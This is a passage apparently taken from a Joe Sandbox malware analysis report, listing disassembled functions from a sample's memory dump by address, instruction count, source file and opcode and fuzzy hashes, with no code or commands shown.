                                                                              • Opcode Fuzzy Hash: 51671f5a1e8a90622270a5341c7d9623eab0dd84c3c908bd50ecbee773285029
                                                                              • Instruction Fuzzy Hash: 7CE1E532D0E6D65FE352A7ACA8691EA7FE0FF52354F0801BBC0888B1D3DE1968458759
                                                                              Function 00007FF848F20A19 Relevance: .3, Instructions: 283COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0e5f33c8698e5046ebd067a742f69bb1e3b864ab73bd7977091761fd05cf8876
                                                                              • Instruction ID: 76be3ef2e171e2496ce00ec6b07373cb784e0cf483d7928a203544d65641e415
                                                                              • Opcode Fuzzy Hash: 0e5f33c8698e5046ebd067a742f69bb1e3b864ab73bd7977091761fd05cf8876
                                                                              • Instruction Fuzzy Hash: 91713622A1DA490FE369773C68552B576C2EBCA790F24027DD8CFC32C3EE2D68074249
                                                                              Function 00007FF848F21A0D Relevance: .2, Instructions: 221COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d0bd58c743f48c6655931b3512391f4164fcfec07179a7a208c050b8e76ea05
                                                                              • Instruction ID: d9048f7ddbe3a486fa30e13ef6766ea2c21dc007163fdcc853ad6dd1d6e9d06c
                                                                              • Opcode Fuzzy Hash: 4d0bd58c743f48c6655931b3512391f4164fcfec07179a7a208c050b8e76ea05
                                                                              • Instruction Fuzzy Hash: 2C71D572D0D69A9FE745EBB8A4592EA7FF0FF11354F0801BAC048CB193DF2928458759
                                                                              Function 00007FF848F2083D Relevance: .2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b3e4ce8a56e483034dbd6036da2fbad9577c67c04bc28c687e389490a52f3b46
                                                                              • Instruction ID: a9dee1b962f6de0799ee4ae9a7e8abb8b29ee5af5bbced81606ec2fc1e244858
                                                                              • Opcode Fuzzy Hash: b3e4ce8a56e483034dbd6036da2fbad9577c67c04bc28c687e389490a52f3b46
                                                                              • Instruction Fuzzy Hash: 78514932E1DA588FE794FB3C94492BA7BE1FF88355F15017AE44AC7292DF2898018741
                                                                              Function 00007FF848F21C45 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 61211422b9fe9754735f013dd5814c2a011866834800b5c6cd51c17b77f49355
                                                                              • Instruction ID: 25f6fe261f45cbbbf394d8c3056a1cf41b7d3ea6bc1e15552ffb2d42d901c4dc
                                                                              • Opcode Fuzzy Hash: 61211422b9fe9754735f013dd5814c2a011866834800b5c6cd51c17b77f49355
                                                                              • Instruction Fuzzy Hash: 95418C71919A8A9FF388EF58E8593F97EE0EB15344F50817EC009D37A2CBBD24498749
                                                                              Function 00007FF848F2155D Relevance: .1, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d4a9dcf58782917237bae2a55f01536d6b021544be12379b0ae09c2dfdda498d
                                                                              • Instruction ID: 54fc8724e1a515433dd5162b03974324e1cb0506b2994722f9be43afbbc22a4c
                                                                              • Opcode Fuzzy Hash: d4a9dcf58782917237bae2a55f01536d6b021544be12379b0ae09c2dfdda498d
                                                                              • Instruction Fuzzy Hash: 1231E432A0D2598FE702FBB8A8152DDBBB0FF41361F1441B7C144C71C2DB3866898799
                                                                              Function 00007FF848F212E8 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 180682b8c71a0f0793110fbbd2153d8a769b212f6a0bc4addc152d89fe8be51f
                                                                              • Instruction ID: 47ee8aa9f9c71e38beecd15989d7f7a99b8e3ef99be2e25cc79fb8117dafb97e
                                                                              • Opcode Fuzzy Hash: 180682b8c71a0f0793110fbbd2153d8a769b212f6a0bc4addc152d89fe8be51f
                                                                              • Instruction Fuzzy Hash: 0121F231B2DA594FE788F72CA45977936C2EB98751F4440B9E80DC32D3DE19AC418289
                                                                              Function 00007FF848F20CB9 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9680b48a2d1701f32c4714d70751153695e07d28a5de61bb64aedc1599198c41
                                                                              • Instruction ID: 8c02dd72c72257d9a73f4e3be4e6e5929ebd913e838d3dfa68ec68e300a7eefc
                                                                              • Opcode Fuzzy Hash: 9680b48a2d1701f32c4714d70751153695e07d28a5de61bb64aedc1599198c41
                                                                              • Instruction Fuzzy Hash: 7E2165A2A0E7560AE379762C7C512757FE1DFC5280F58027AD89AC22C3EE0EA8054398
                                                                              Function 00007FF848F20868 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a193c5ec8cbd8f086ca67c2b4a424ca8ac3b4d95c6b971ea61ce40dde52675a5
                                                                              • Instruction ID: bc59099977a0ec842badcf30b682586e6d8ce4970140345d3e55db546a06f0e1
                                                                              • Opcode Fuzzy Hash: a193c5ec8cbd8f086ca67c2b4a424ca8ac3b4d95c6b971ea61ce40dde52675a5
                                                                              • Instruction Fuzzy Hash: 3211E33295C7984FD760BB2898495FB7BE0FB89269F10063FE89AD2281DB3494058782
                                                                              Function 00007FF848F21588 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa45312c868a3900a5daffd8d11bd287bd394ff4c789289d9f9794e6edda308a
                                                                              • Instruction ID: ffbd9cf26cbe2fa80091a4aa54ffcbf16d99b97beced5d6fd047eb0b9c582d57
                                                                              • Opcode Fuzzy Hash: fa45312c868a3900a5daffd8d11bd287bd394ff4c789289d9f9794e6edda308a
                                                                              • Instruction Fuzzy Hash: 2711AC32A0D6898FE702FBB8D85519CBBB0FF41361F1842F7D094DB2C2E63866498784
                                                                              Function 00007FF848F21E1D Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4bb92fd69b5cd32e7b4f4fc97bbaa538df31063b3af3f66ea13e52c3f0a64356
                                                                              • Instruction ID: 004197f69dfb11c3a7ca8d5e3f960b0ea0033061fc8fd578287247a6ab717e1d
                                                                              • Opcode Fuzzy Hash: 4bb92fd69b5cd32e7b4f4fc97bbaa538df31063b3af3f66ea13e52c3f0a64356
                                                                              • Instruction Fuzzy Hash: 8E01F22088EAE61FD35A67B4AC215A23FE0DF87550B0901FAD085CB5E3C94E2882C365
                                                                              Function 00007FF848F21590 Relevance: .1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd2a6e6e7e3eb3fc677bd909f3f4c130deb4bef9c83d0425e01f49a30b4a411d
                                                                              • Instruction ID: f307069bc66060e2aea741e339c1fd42f7ea4fac119f475491363390652e641f
                                                                              • Opcode Fuzzy Hash: bd2a6e6e7e3eb3fc677bd909f3f4c130deb4bef9c83d0425e01f49a30b4a411d
                                                                              • Instruction Fuzzy Hash: 88018B31A0D6898FE702EBB8985519DBBB0EF02351F1842F7D044DB292E63866498784
                                                                              Function 00007FF848F21598 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5591b72c6c79205f01883c6769bd5d1f956d0ed4acf34a628476729d56e3ef0e
                                                                              • Instruction ID: 37264bc085347f96355ebcd137854c9081b9ae6346d9e9f962f8625712115034
                                                                              • Opcode Fuzzy Hash: 5591b72c6c79205f01883c6769bd5d1f956d0ed4acf34a628476729d56e3ef0e
                                                                              • Instruction Fuzzy Hash: F3014C31A0D6898FE702EBB8985519DBFB0EF06351F1842E6D045DB2D2EA3966888749
                                                                              Function 00007FF848F215A0 Relevance: .0, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 41988eeff6baba1e0cc1c0027e35576cceef960f31ac99266584d7a0f75da0fc
                                                                              • Instruction ID: 29950ec6e6b08d5d1e952aa10690531af4e18397ec1ac11ab5f0bc4a1ecac7c2
                                                                              • Opcode Fuzzy Hash: 41988eeff6baba1e0cc1c0027e35576cceef960f31ac99266584d7a0f75da0fc
                                                                              • Instruction Fuzzy Hash: C4018B31D0D2898FE702EBB898541AD7FB0FF06350F1842E6D045DB2D2EA396A84C748
                                                                              Function 00007FF848F346FB Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                                              • Instruction ID: 9831776f39be8d88b1dcd12fec3a3757dd8060037e279044a3edf7564f8e5df1
                                                                              • Opcode Fuzzy Hash: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                                              • Instruction Fuzzy Hash: B3F03A31E0C5074FE658BB5CA8406B93290AB65350F1441B6D85EC32C7EF29E8428689
                                                                              Function 00007FF848F21E50 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e61d7acb694f4bcbad8acb74a1258d222ad2c38308e5b5e3be632c92ecc73521
                                                                              • Instruction ID: 0d64650f72e19c02496b2615c1034b86c922020654caa90900bec64c25d0aba0
                                                                              • Opcode Fuzzy Hash: e61d7acb694f4bcbad8acb74a1258d222ad2c38308e5b5e3be632c92ecc73521
                                                                              • Instruction Fuzzy Hash: DAE02630D0C85A1BD76CB674B8611B57380EB85614B0501BDD81AC26C2DD0D1CC14285
                                                                              Function 00007FF848F35108 Relevance: .0, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                                              • Instruction ID: 3f09c4dfbf47e0ac129323fef42a506154402d2ff7725c9658671c79542c5556
                                                                              • Opcode Fuzzy Hash: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                                              • Instruction Fuzzy Hash: BCD05E30B6090D4B8B0CB62D8458431B3D1E7AA6067D45279940BC2285ED25ECC68B84
                                                                              Function 00007FF848F24D19 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction ID: a0ef43eac895e8919646699a1fb25f6cbc23e39a4773cea35b8ca63caf33e1e7
                                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction Fuzzy Hash: 82E0ED30E0C01A4AFB54A684E850BB96251EB48350F1040B8D94EE32C1DE3DAE45DB6D
                                                                              Function 00007FF848F33990 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                              Function 00007FF848F33F7E Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cafb1b3b9a07ba492a4b026b077b8202583e91bd76fe5a77add893989b535b44
                                                                              • Instruction ID: 19cd3a6caecddb34dd05e011df979e06d9b7fe0b97793150049423ee68fa118c
                                                                              • Opcode Fuzzy Hash: cafb1b3b9a07ba492a4b026b077b8202583e91bd76fe5a77add893989b535b44
                                                                              • Instruction Fuzzy Hash: 07E0B670D0861E9EE784EB58D8196BD76F2FB54784F00413A90099B695DF3918048744
                                                                              Function 00007FF848F3C98B Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d79975e3c3ba1395657c09d8ee85d1cc194a09ed6e3cc3ad0f0692fd2139ca0
                                                                              • Instruction ID: 556d0a9053b52893d32be4bc8ea2be29f71e740435ca5f84542a1f6b2a3af1c2
                                                                              • Opcode Fuzzy Hash: 1d79975e3c3ba1395657c09d8ee85d1cc194a09ed6e3cc3ad0f0692fd2139ca0
                                                                              • Instruction Fuzzy Hash: D0D0C730B1D6595FE7D5B7344051A695191AF88344F50547A941ED32C7CF2CFC058749
                                                                              Function 00007FF848F22759 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd233c906372fa1cf4f3cfb251d4d8cab9cfb833b18533bb6d2e6709ed772239
                                                                              • Instruction ID: 4c870258a67a5a1ef3dba16b9f99b098dce41c7ed38fd0dba401051373db26ea
                                                                              • Opcode Fuzzy Hash: bd233c906372fa1cf4f3cfb251d4d8cab9cfb833b18533bb6d2e6709ed772239
                                                                              • Instruction Fuzzy Hash: 85D0A730D1C4498FDB51DA04C498768F791FB08340F1446A0C80CD3281C735DE81DB40
                                                                              Function 00007FF848F21765 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction ID: 5c3c5e2eabfd9e4a72f26667cad19bcf432ea7efe5585b19d926a11c802f8f9c
                                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction Fuzzy Hash: A9C08C34529808CFC908FB2DC88890833B0FB0A304BC200A0E40DC72B1D21AECD2D782
                                                                              Function 00007FF848F20705 Relevance: .0, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction ID: da15baa32441ac79f4ccf3cfdc8b808db5bac881a4515f170c6908b801fe7f0c
                                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction Fuzzy Hash: D1C08C22D1E80B4AE620336934860ACA1009BC43D0FD00232D90C800C1AE0F20C5059E
                                                                              Function 00007FF848F20728 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction ID: 1b9d21fc4baaaa9c316c4001c1f62b1f8948b386bee9db51621e34394594a6df
                                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction Fuzzy Hash: 61B01210C6EC0E04D71433B5288706470005B84280FC00370E808800C2E94F20D4029A
                                                                              Function 00007FF848F35DBF Relevance: .0, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction ID: 65ed6f13eff287e3a5db717d598cc32cb3efd04870b7446ad96a669eb26a2b3e
                                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction Fuzzy Hash: 4AB09230D0C25A8FE740BA8080003AA22026B88340F208432982E432C28AA96900929A